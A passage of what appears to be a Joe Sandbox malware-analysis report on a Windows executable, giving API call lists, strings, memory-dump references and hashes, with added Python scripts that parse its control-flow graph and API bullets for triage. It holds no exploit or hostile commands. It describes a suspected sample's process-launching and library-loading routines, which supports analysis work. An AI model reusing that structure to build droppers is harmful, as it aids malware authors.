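    current: Optional[Block] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit():
            rng = _RANGE.match(tokens[i + 1])
            if not rng:
                raise ValueError(f"node {tok} lacks an address range: {tokens[i + 1]!r}")
            start = int(rng.group(1), 16)
            end = int(rng.group(2), 16) if rng.group(2) else start
            current = Block(node=int(tok), start=start, end=end)
            blocks[current.node] = current
            i += 2
        elif current is None:
            raise ValueError(f"annotation {tok!r} before any node")
        elif tok == "call":
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
        else:
            current.apis.append(tok)
            i += 1
    return blocks, edges


def entry_node(blocks: Dict[int, Block]) -> int:
    """The function entry is the lowest-addressed block."""
    return min(blocks.values(), key=lambda b: b.start).node


def path_to_api(blocks: Dict[int, Block], edges: List[Tuple[int, int]],
                api: str) -> Optional[List[int]]:
    """Shortest path (node ids) from the entry to a block invoking `api`;
    None if no block invokes it or none of those blocks is reachable."""
    succ: Dict[int, List[int]] = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    targets = {n for n, blk in blocks.items() if api in blk.apis}
    if not targets:
        return None
    start = entry_node(blocks)
    parent: Dict[int, Optional[int]] = {start: None}
    queue = deque([start])
    while queue:
        n = queue.popleft()
        if n in targets:
            path: List[int] = []
            cur: Optional[int] = n
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            return path[::-1]
        for s in succ.get(n, []):
            if s not in parent:
                parent[s] = n
                queue.append(s)
    return None


def describe_path(blocks: Dict[int, Block], path: List[int]) -> List[str]:
    """Address ranges along a path, e.g. '4015c6-4015da'."""
    return [f"{blocks[n].start:x}-{blocks[n].end:x}" for n in path]


if __name__ == "__main__":
    blocks, edges = parse_cfg(SAMPLE_CFG)
    for api in ("GetFileAttributesW", "SetCurrentDirectoryW"):
        path = path_to_api(blocks, edges, api)
        print(api, "<-", " -> ".join(describe_path(blocks, path)) if path else "unreachable")
```

The shortest path is a lower bound on what must run, not a trace: the back edges 775->751 and 775->752 show the routine loops, so GetFileAttributesW at 40161c may be reached several times per call.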

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 782 401f17-401f89 call 402dab * 4 call 401423 call 405b47 795 402933-40293a 782->795 796 401f8f-401f96 782->796 797 402c2f-402c3e 795->797 796->797 798 401f9c-401ff6 call 4069c0 FindCloseChangeNotification 796->798 798->795 798->797
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405B47: ShellExecuteExW.SHELL32(?), ref: 00405B56
                                                                                                                                                                                            • Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
                                                                                                                                                                                            • Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • @, xrefs: 00401F8F
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                                                                                                                                                                          • String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                          • API String ID: 4215836453-3372431936
                                                                                                                                                                                          • Opcode ID: d836d7905bb7533233c85fe57c5bfa05dcc9a80140d7520876a6c06b4da0e839
                                                                                                                                                                                          • Instruction ID: 03637a129ab95ddc499dee3230b5434bcfd115e463ad3160f2db423ce5d2e87e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d836d7905bb7533233c85fe57c5bfa05dcc9a80140d7520876a6c06b4da0e839
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09112B71A042189ADB50EFB9CA49B8DB6F0AF14308F20457FE505F72D2DBBC89459F18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%
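The two entries above describe, through their APIs lists, a directory-preparation routine at 004015c6 (GetFileAttributesW, then CreateDirectoryW and SetCurrentDirectoryW via subcalls) and a launcher at 00401f17 whose subcalls reach ShellExecuteExW, WaitForSingleObject and GetExitCodeProcess before the handle is closed. When a report has hundreds of such entries, the APIs bullets are better parsed than read. The Python below is an added example, not code from Joe Sandbox or its IDA plugin: it turns the bullet lines into call records, folds the A/W suffix, and flags the two API sets. The pattern names and the alias table are this example's own choices; the line format is inferred from the entries on this page, and the sample input is their APIs bullets copied verbatim. One caveat worth building in: FindCloseChangeNotification and CloseHandle share an export address in kernelbase, so address-based name resolution commonly reports the former for an ordinary CloseHandle call, which is almost certainly what the 00401FF0 site is.

```python
"""Parse the per-function "APIs" bullets of a Joe Sandbox disassembly report and
flag behaviours by the set of Win32 APIs a function (including subcalls) reaches.
Added example; pattern names and the alias table are this script's own."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the APIs bullets of the 004015c6 and 00401f17 entries, copied from the report.
SAMPLE = r"""
• Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
• Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
• Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
• Part of subcall function 00405A75: CreateDirectoryW.KERNEL32(?,?), ref: 00405AB7
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 00401652
• Part of subcall function 00405B47: ShellExecuteExW.SHELL32(?), ref: 00405B56
• Part of subcall function 004069C0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
• Part of subcall function 004069C0: GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
• FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FF0
"""

# Matches both direct calls and "Part of subcall function XXXXXXXX:" bullets.
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                # address of the call instruction
    subcall: Optional[int]  # callee address when reported as "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    """One ApiCall per bullet; headings and other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        # Arguments are comma-separated; a path argument that itself contains a
        # comma would be split too (acceptable for triage, not for exact reconstruction).
        args = [a.strip() for a in m.group("args").split(",")]
        calls.append(ApiCall(api=m.group("api"), module=m.group("module"), args=args,
                             ref=int(m.group("ref"), 16),
                             subcall=int(m.group("sub"), 16) if m.group("sub") else None))
    return calls


# Static name resolution picks one name per address; FindCloseChangeNotification and
# CloseHandle share an export address in kernelbase, so reports show the former.
ALIASES = {"FindCloseChangeNotification": "CloseHandle"}


def canonical(api: str) -> str:
    """Fold aliases and drop the A/W charset suffix so each pattern is written once."""
    api = ALIASES.get(api, api)
    if len(api) > 2 and api[-1] in "AW" and api[-2].islower():
        api = api[:-1]
    return api


# Behaviour signatures as API sets; the names are this example's own.
PATTERNS = {
    "prepare-directory": {"GetFileAttributes", "CreateDirectory", "SetCurrentDirectory"},
    "spawn-and-wait": {"ShellExecuteEx", "WaitForSingleObject", "GetExitCodeProcess", "CloseHandle"},
}


def match_patterns(calls: List[ApiCall]) -> Dict[str, List[int]]:
    """pattern name -> sorted call-site addresses, for every pattern whose APIs all occur."""
    sites: Dict[str, List[int]] = {}
    for c in calls:
        sites.setdefault(canonical(c.api), []).append(c.ref)
    return {name: sorted(r for api in apis for r in sites[api])
            for name, apis in PATTERNS.items() if apis <= set(sites)}


def path_indicators(calls: List[ApiCall]) -> List[str]:
    """Distinct path-like arguments: the file-system indicators worth hunting for."""
    return sorted({a for c in calls for a in c.args if "\\" in a})


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for name, refs in match_patterns(calls).items():
        print(name, [f"{r:08X}" for r in refs])
    print(path_indicators(calls))
```

Matching on API sets rather than call order is deliberate: the sites live in different subroutines (00405B47 and 004069C0 here), and the report gives no execution order across them, so an ordered signature would claim more than the page supports.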

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                                                                                          • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                                                                                                                          • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
• Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
• Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
• Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
• Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
• Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
• Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
Uniqueness

Uniqueness Score: -1.00%

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
• Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
• Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
• Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
Uniqueness

Uniqueness Score: -1.00%

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
• Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
• Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
• Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
Uniqueness

Uniqueness Score: -1.00%

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
• Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
• Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
• Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
Uniqueness

Uniqueness Score: -1.00%

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
• Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
• Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
• Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalFree.KERNELBASE(006BA9B0), ref: 00401C10
• GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
Strings
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: open
• API String ID: 3394109436-2758837156
• Opcode ID: 2e7873d53c65363ebbf06334e61aa70f6cf79d8760b6e8fa7e4ab63ec6aaec53
• Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
• Opcode Fuzzy Hash: 2e7873d53c65363ebbf06334e61aa70f6cf79d8760b6e8fa7e4ab63ec6aaec53
• Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
Uniqueness

Uniqueness Score: -1.00%

APIs
• WaitForSingleObject.KERNEL32(?,00000064), ref: 004069D1
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004069E6
• GetExitCodeProcess.KERNELBASE(?,?), ref: 004069F3
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ObjectSingleWait$CodeExitProcess
• String ID:
• API String ID: 2567322000-0
• Opcode ID: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
• Instruction ID: f1848df8738bec86e5a9e013d2d1160024fdc01f5a204198474b6b1514677e65
• Opcode Fuzzy Hash: 2f96d25466b50161d36a247ea1857d3da149f4b0ac0fce789d184ce1e3082720
• Instruction Fuzzy Hash: CCE09272600218BBDB009B54CD02E9E7B6ADB44704F100033BA05B6190C6B19E62DB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
• Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
• Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
• Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
• GetProcAddress.KERNEL32(00000000,?), ref: 00406942
  • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
  • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
  • Part of subcall function 004068A5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
• Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
• Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
• Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
Memory Dump Source
• Source File: 00000000.00000002.1785301367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1785288284.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785315325.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000414000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785327770.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785422970.000000000043A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
• Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
• Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
• Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
• Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
• Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694
Uniqueness
• Uniqueness Score: -1.00%
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
• GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
• Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
• Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
Uniqueness
• Uniqueness Score: -1.00%
APIs
